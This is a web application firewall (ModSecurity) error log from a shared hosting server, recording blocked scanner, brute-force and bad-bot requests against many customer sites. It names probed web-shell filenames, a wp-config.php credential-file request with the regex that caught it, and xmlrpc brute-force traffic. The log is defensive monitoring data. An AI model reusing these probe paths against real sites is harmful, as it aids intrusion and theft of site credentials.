[Tue May 26 17:07:37.845881 2026] [security2:error] [pid 851641:tid 851845] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGARp8QSN2510avp5CwgAAAEo"]
[Tue May 26 17:07:38.246149 2026] [security2:error] [pid 851641:tid 851897] [client 194.116.236.215:39578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.236.116.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/index.php"] [unique_id "ahWGAhp8QSN2510avp5C2AAAAH4"]
[Tue May 26 17:07:38.382798 2026] [security2:error] [pid 851641:tid 851778] [client 104.234.53.161:26795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 161.53.234.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahWGARp8QSN2510avp5C0QAAAAc"], referer: https://duckduckgo.com/
[Tue May 26 17:07:38.549126 2026] [security2:error] [pid 851641:tid 851800] [client 194.116.236.215:39584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.236.116.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/index.php"] [unique_id "ahWGAhp8QSN2510avp5C5gAAAB0"]
[Tue May 26 17:07:38.750802 2026] [security2:error] [pid 851641:tid 851757] [remote 152.53.111.131:46500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.111.53.152.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWGAhp8QSN2510avp5C4gAAa3M"]
[Tue May 26 17:07:38.823356 2026] [security2:error] [pid 851641:tid 851896] [client 194.116.236.215:55592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.236.116.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/index.php"] [unique_id "ahWGAhp8QSN2510avp5C7AAAAH0"]
[Tue May 26 17:07:38.965293 2026] [security2:error] [pid 851641:tid 851885] [client 194.116.236.215:55606] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.236.116.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/index.php"] [unique_id "ahWGAhp8QSN2510avp5C8QAAAHI"]
[Tue May 26 17:07:39.634183 2026] [security2:error] [pid 851641:tid 851814] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGAxp8QSN2510avp5C-gAAACs"]
[Tue May 26 17:07:41.328269 2026] [security2:error] [pid 851641:tid 851831] [client 18.192.166.72:17610] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWGBRp8QSN2510avp5DKwAAADw"], referer: https://thegoodsporting.com
[Tue May 26 17:07:42.209743 2026] [security2:error] [pid 851641:tid 851798] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGBRp8QSN2510avp5DPAAAABs"]
[Tue May 26 17:07:43.573775 2026] [security2:error] [pid 851641:tid 851872] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWGBxp8QSN2510avp5DagAAAGU"]
[Tue May 26 17:07:44.075213 2026] [security2:error] [pid 851641:tid 851861] [client 20.151.214.118:1422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.virgence.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWGCBp8QSN2510avp5DeQAAAFo"]
[Tue May 26 17:07:44.075381 2026] [security2:error] [pid 851641:tid 851861] [client 20.151.214.118:1422] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webdisk.virgence.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWGCBp8QSN2510avp5DeQAAAFo"]
[Tue May 26 17:07:44.235499 2026] [security2:error] [pid 851641:tid 851804] [client 20.151.214.118:1420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.virgence.com"] [uri "/166.php"] [unique_id "ahWGCBp8QSN2510avp5DiAAAACE"]
[Tue May 26 17:07:44.235607 2026] [security2:error] [pid 851641:tid 851804] [client 20.151.214.118:1420] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webdisk.virgence.com"] [uri "/166.php"] [unique_id "ahWGCBp8QSN2510avp5DiAAAACE"]
[Tue May 26 17:07:44.378143 2026] [security2:error] [pid 851641:tid 851845] [client 20.151.214.118:1428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.virgence.com"] [uri "/ups.php"] [unique_id "ahWGCBp8QSN2510avp5DiQAAAEo"]
[Tue May 26 17:07:44.378270 2026] [security2:error] [pid 851641:tid 851845] [client 20.151.214.118:1428] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webdisk.virgence.com"] [uri "/ups.php"] [unique_id "ahWGCBp8QSN2510avp5DiQAAAEo"]
[Tue May 26 17:07:44.520953 2026] [security2:error] [pid 851641:tid 851860] [client 20.151.214.118:1438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.virgence.com"] [uri "/file5.php"] [unique_id "ahWGCBp8QSN2510avp5DkAAAAFk"]
[Tue May 26 17:07:44.521057 2026] [security2:error] [pid 851641:tid 851860] [client 20.151.214.118:1438] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webdisk.virgence.com"] [uri "/file5.php"] [unique_id "ahWGCBp8QSN2510avp5DkAAAAFk"]
[Tue May 26 17:07:44.634418 2026] [security2:error] [pid 851641:tid 851827] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGCBp8QSN2510avp5DhwAAADg"]
[Tue May 26 17:07:44.665932 2026] [security2:error] [pid 851641:tid 851809] [client 20.151.214.118:1434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.virgence.com"] [uri "/file.php"] [unique_id "ahWGCBp8QSN2510avp5DkgAAACY"]
[Tue May 26 17:07:44.666083 2026] [security2:error] [pid 851641:tid 851809] [client 20.151.214.118:1434] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webdisk.virgence.com"] [uri "/file.php"] [unique_id "ahWGCBp8QSN2510avp5DkgAAACY"]
[Tue May 26 17:07:44.830592 2026] [security2:error] [pid 851641:tid 851826] [client 20.151.214.118:1433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.virgence.com"] [uri "/wp_filemanager.php"] [unique_id "ahWGCBp8QSN2510avp5DlQAAADc"]
[Tue May 26 17:07:44.830749 2026] [security2:error] [pid 851641:tid 851826] [client 20.151.214.118:1433] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webdisk.virgence.com"] [uri "/wp_filemanager.php"] [unique_id "ahWGCBp8QSN2510avp5DlQAAADc"]
[Tue May 26 17:07:44.989298 2026] [security2:error] [pid 851641:tid 851889] [client 20.151.214.118:1414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.virgence.com"] [uri "/file18.php"] [unique_id "ahWGCBp8QSN2510avp5DogAAAHY"]
[Tue May 26 17:07:44.989431 2026] [security2:error] [pid 851641:tid 851889] [client 20.151.214.118:1414] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webdisk.virgence.com"] [uri "/file18.php"] [unique_id "ahWGCBp8QSN2510avp5DogAAAHY"]
[Tue May 26 17:07:45.142981 2026] [security2:error] [pid 851641:tid 851881] [client 20.151.214.118:1412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.214.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.virgence.com"] [uri "/hplfuns.php"] [unique_id "ahWGCRp8QSN2510avp5DowAAAG4"]
[Tue May 26 17:07:45.143105 2026] [security2:error] [pid 851641:tid 851881] [client 20.151.214.118:1412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webdisk.virgence.com"] [uri "/hplfuns.php"] [unique_id "ahWGCRp8QSN2510avp5DowAAAG4"]
[Tue May 26 17:07:45.292508 2026] [security2:error] [pid 851641:tid 851806] [client 20.151.214.118:1413] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webdisk.virgence.com"] [uri "/wp-config.php"] [unique_id "ahWGCRp8QSN2510avp5DpAAAACM"]
[Tue May 26 17:07:45.292695 2026] [security2:error] [pid 851641:tid 851806] [client 20.151.214.118:1413] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "406"] [hostname "webdisk.virgence.com"] [uri "/wp-config.php"] [unique_id "ahWGCRp8QSN2510avp5DpAAAACM"]
[Tue May 26 17:07:46.415451 2026] [security2:error] [pid 851641:tid 851853] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGChp8QSN2510avp5DsQAAAFI"]
[Tue May 26 17:07:46.900972 2026] [security2:error] [pid 851641:tid 851844] [client 47.128.42.179:37272] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "christinaspromotions.com"] [uri "/robots.txt"] [unique_id "ahWGChp8QSN2510avp5DzgAAAEk"]
[Tue May 26 17:07:47.173028 2026] [security2:error] [pid 851641:tid 851803] [client 203.194.101.7:54555] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGCxp8QSN2510avp5D1QAAACA"]
[Tue May 26 17:07:47.173557 2026] [security2:error] [pid 851641:tid 851803] [client 203.194.101.7:54555] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGCxp8QSN2510avp5D1QAAACA"]
[Tue May 26 17:07:47.292613 2026] [security2:error] [pid 851641:tid 851642] [remote 74.7.241.58:40080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWGCxp8QSN2510avp5D2QAAQAA"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:07:48.449501 2026] [security2:error] [pid 851641:tid 851800] [client 103.174.5.177:35057] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWGDBp8QSN2510avp5D6gAAAB0"]
[Tue May 26 17:07:48.712365 2026] [security2:error] [pid 851641:tid 851828] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGDBp8QSN2510avp5D6QAAADk"]
[Tue May 26 17:07:50.390725 2026] [security2:error] [pid 851641:tid 851842] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGDRp8QSN2510avp5EHAAAAEc"]
[Tue May 26 17:07:51.602323 2026] [security2:error] [pid 851641:tid 851872] [client 178.20.45.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahWGDxp8QSN2510avp5EPwAAAGU"], referer: http://bloggertarget.com/100-best-online-forum-submissions-site-list/
[Tue May 26 17:07:52.923301 2026] [security2:error] [pid 851641:tid 851842] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGEBp8QSN2510avp5EXAAAAEc"]
[Tue May 26 17:07:53.360185 2026] [security2:error] [pid 851641:tid 851865] [client 178.20.45.159:51377] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "178.20.45.159" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWGERp8QSN2510avp5EegAAAF4"], referer: http://www.bloggertarget.com/100-best-online-forum-submissions-site-list/
[Tue May 26 17:07:53.360302 2026] [security2:error] [pid 851641:tid 851865] [client 178.20.45.159:51377] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWGERp8QSN2510avp5EegAAAF4"], referer: http://www.bloggertarget.com/100-best-online-forum-submissions-site-list/
[Tue May 26 17:07:54.748567 2026] [security2:error] [pid 851641:tid 851885] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGEhp8QSN2510avp5EjAAAAHI"]
[Tue May 26 17:07:55.061369 2026] [security2:error] [pid 851641:tid 851796] [client 43.165.172.131:41318] ModSecurity: Access denied with code 406 (phase 1). RBL lookup of 131.172.165.43.csi.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1548"] [id "900927"] [msg "contact-form RBL block: csi.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWGExp8QSN2510avp5EnQAAABk"], referer: http://www.bloggertarget.com/100-best-online-forum-submissions-site-list/
[Tue May 26 17:07:55.091784 2026] [security2:error] [pid 851641:tid 851796] [client 43.165.172.131:41318] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWGExp8QSN2510avp5EnQAAABk"], referer: http://www.bloggertarget.com/100-best-online-forum-submissions-site-list/
[Tue May 26 17:07:56.858171 2026] [http2:info] [pid 860158:tid 860158] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 17:07:57.391683 2026] [security2:error] [pid 860158:tid 860305] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGFIYFlz_JJsUnscKYLAAAAJY"]
[Tue May 26 17:07:57.792049 2026] [security2:error] [pid 860158:tid 860304] [client 203.194.101.7:54896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGFYYFlz_JJsUnscKYNgAAAJU"]
[Tue May 26 17:07:57.792275 2026] [security2:error] [pid 860158:tid 860304] [client 203.194.101.7:54896] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGFYYFlz_JJsUnscKYNgAAAJU"]
[Tue May 26 17:07:58.859985 2026] [security2:error] [pid 860158:tid 860346] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGFoYFlz_JJsUnscKYRwAAAL8"]
[Tue May 26 17:08:00.539523 2026] [security2:error] [pid 860158:tid 860389] [client 20.15.133.165:49088] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "deeigo.com"] [uri "/public/index.php"] [unique_id "ahWGF4YFlz_JJsUnscKYXgAA6nE"]
[Tue May 26 17:08:01.669397 2026] [security2:error] [pid 860158:tid 860334] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGGYYFlz_JJsUnscKYegAAALM"]
[Tue May 26 17:08:02.669941 2026] [security2:error] [pid 860158:tid 860366] [client 185.191.171.3:58350] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahWGGoYFlz_JJsUnscKYpgAAANM"]
[Tue May 26 17:08:02.670104 2026] [security2:error] [pid 860158:tid 860366] [client 185.191.171.3:58350] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahWGGoYFlz_JJsUnscKYpgAAANM"]
[Tue May 26 17:08:02.770573 2026] [security2:error] [pid 860158:tid 860365] [client 146.174.183.215:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGGoYFlz_JJsUnscKYngAAANI"]
[Tue May 26 17:08:03.769880 2026] [security2:error] [pid 860158:tid 860290] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGG4YFlz_JJsUnscKYtgAAAIc"]
[Tue May 26 17:08:05.221368 2026] [security2:error] [pid 860158:tid 860389] [client 168.196.238.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWGHYYFlz_JJsUnscKY6QAAAOo"], referer: https://www.anujtradingco.com/
[Tue May 26 17:08:05.850107 2026] [security2:error] [pid 860158:tid 860405] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGHYYFlz_JJsUnscKY7wAAAPo"]
[Tue May 26 17:08:06.186920 2026] [security2:error] [pid 860158:tid 860319] [client 168.196.238.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWGHoYFlz_JJsUnscKZBgAAAKQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 17:08:07.296067 2026] [security2:error] [pid 860158:tid 860371] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGHoYFlz_JJsUnscKZHAAAANg"]
[Tue May 26 17:08:08.097716 2026] [security2:error] [pid 860158:tid 860288] [client 203.194.101.7:55235] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGIIYFlz_JJsUnscKZNwAAAIU"]
[Tue May 26 17:08:08.098749 2026] [security2:error] [pid 860158:tid 860288] [client 203.194.101.7:55235] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGIIYFlz_JJsUnscKZNwAAAIU"]
[Tue May 26 17:08:09.558402 2026] [security2:error] [pid 860158:tid 860294] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGIYYFlz_JJsUnscKZRwAAAIs"]
[Tue May 26 17:08:11.870484 2026] [security2:error] [pid 860158:tid 860328] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGI4YFlz_JJsUnscKZgAAAAK0"]
[Tue May 26 17:08:12.436614 2026] [security2:error] [pid 860158:tid 860381] [client 107.189.16.223:63469] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "bosscoirs.com"] [uri "/Search-Replace-DB-master/"] [unique_id "ahWGJIYFlz_JJsUnscKZmQAAAOI"]
